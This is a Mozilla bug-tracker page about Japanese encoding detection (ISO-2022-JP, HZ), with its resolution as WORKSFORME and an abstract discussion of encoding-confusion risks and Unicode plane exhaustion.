* Bug 945213 - Align our Japanese detection with Trident or WebKit

Resolving this bug as WFM per earlier comments.

If someone comes up with a realistic attack for interpreting ISO-2022-JP CSS/JS as non-ISO-2022-JP, let's open a new bug about making the CSS and JS parsers halt upon seeing U+001B. I don't see us adding a browser-side defense for the analogous HZ scenario even if someone did show a plausible attack. For the reverse HZ scenario, the best we could do would be mapping HZ to the replacement encoding. Whether that's feasible is an open question pending telemetry.
Status: ASSIGNED → RESOLVED
Closed: 12 years ago → 11 years ago
Resolution: --- → WORKSFORME
(In reply to Anne (:annevk) from comment #52)
> Raising that limit would break JavaScript (and therefore the web).

Yes, but nonetheless, eventually we will have to do it.

> Out of 16 planes 10 are unassigned.

Linear extrapolation from allocations so far predicts exhaustion circa 2250. I consider that an unlikely, ideal scenario; I expect those 10 planes to be gobbled up in huge chunks, with exhaustion more probably around *20*50. However, either way I do understand if you think this is not worth worrying about at this time.

(In reply to Henri Sivonen (:hsivonen) from comment #53)
> Anyway, if we ever go past 0x10FFFF and get rid of UTF-16 as an
> in-memory representation, chances are that we will have gotten
> rid of UTF-16 as an interchange encoding first

Right, that was what I meant by "won't have UTF-16 to kick around anymore".
Unhiding as requested by :annevk on IRC.
Group: core-security